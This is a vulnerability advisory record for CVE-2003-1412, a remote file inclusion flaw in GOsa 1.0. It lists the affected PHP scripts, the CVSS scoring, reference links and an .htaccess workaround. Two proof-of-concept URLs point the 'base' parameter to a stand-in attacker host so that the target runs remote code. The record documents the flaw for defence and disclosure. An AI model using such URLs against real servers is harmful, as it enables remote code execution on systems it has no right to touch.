CVE-2003-1412
CVSS 6.8
Published: 2003-12-31 00:00:00
Last revised: 2008-09-05 16:36:52

[Original] PHP remote file inclusion vulnerability in index.php for GONiCUS System Administrator (GOsa) 1.0 allows remote attackers to execute arbitrary PHP code via the plugin parameter to (1) 3fax/1blocklists/index.php; (2) 6departamentadmin/index.php, (3) 5terminals/index.php, (4) 4mailinglists/index.php, (5) 3departaments/index.php, and (6) 2groupd/index.php in 2administration/; or (7) the base parameter to include/help.php.


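[CNNVD] GONiCUS System Administrator Remote File Inclusion Vulnerability (CNNVD-200312-280)

        GOnicus System Administrator is a PHP-based tool for managing accounts and systems stored in an LDAP database.
        Some of its PHP scripts do not adequately filter user-supplied input. A remote attacker can exploit this vulnerability to include files from a remote server and execute arbitrary commands contained in the malicious file with the privileges of the web process.
        The following PHP scripts do not properly check requests for included files, so the plugin variable can be set to execute arbitrary files from a remote server:
        plugins/3fax/1blocklists/index.php
        plugins/2administration/6departamentadmin/index.php
        plugins/2administration/5terminals/index.php
        plugins/2administration/4mailinglists/index.php
        plugins/2administration/3departaments/index.php
        plugins/2administration/2groupd/index.php
        The include/help.php file has the same problem: a malicious URI can be submitted that causes an include/common.inc file containing malicious code to be loaded from the attacker's server, so that the malicious commands in that file are executed with web privileges. For example:
        http://target.server/include/help.php?base=http://attackers.server/
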

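- CVSS (Base Score)

CVSS score: 6.8 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: NETWORK [the attacker does not need internal network access or local access]
Authentication: NONE [exploitation requires no authentication]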

- CWE (Weakness Category)

CWE-94 [Improper Control of Generation of Code (Code Injection)]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1412
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1412
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-280
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/11408
(UNKNOWN)  XF  gosa-plugin-file-include(11408)
http://www.securityfocus.com/bid/6922
(UNKNOWN)  BID  6922
http://lists.grok.org.uk/pipermail/full-disclosure/2003-February/003932.html
(UNKNOWN)  FULLDISC  20030223 GOnicus System Administrator php injection
http://www.securitytracker.com/id?1006162
(UNKNOWN)  SECTRACK  1006162
http://www.securityfocus.com/archive/1/archive/1/313282/30/25760/threaded
(UNKNOWN)  BUGTRAQ  20030224 GOnicus System Administrator php injection
http://secunia.com/advisories/8120
(UNKNOWN)  SECUNIA  8120

- Vulnerability Information

GONiCUS System Administrator Remote File Inclusion Vulnerability
Medium risk, Input validation
2003-12-31 00:00:00 2003-12-31 00:00:00
Remote
        

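- Advisories and Patches

        Workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends taking the following measures to reduce the threat:
        * Restrict access via .htaccess to all subdirectories that contain .php files.
        Vendor patch:
        GOnicus
        -------
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

        http://www.gonicus.de/eng/index.html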

- Vulnerability Information (22279)

GONiCUS System Administrator 1.0 Remote File Include Vulnerability (EDBID:22279)
php shellcode
2003-02-24 Verified
0 Karol Wiesek
N/A
source: http://www.securityfocus.com/bid/6922/info

GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders.

By crafting specific URI parameters it is possible for an attacker to influence the include path for these scripts to an external file on an attacker-controlled host. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the vulnerable web server.

This vulnerability has been reported for GONiCUS System Administrator Version 1; previous versions may also be affected.

http://www.example.org/include/help.php?base=http://www.attacker.org/ 		

- Vulnerability Information

51195
GOsa plugins/3fax/1blocklists/index.php plugin Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

- Timeline

2003-02-24 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete
 

 
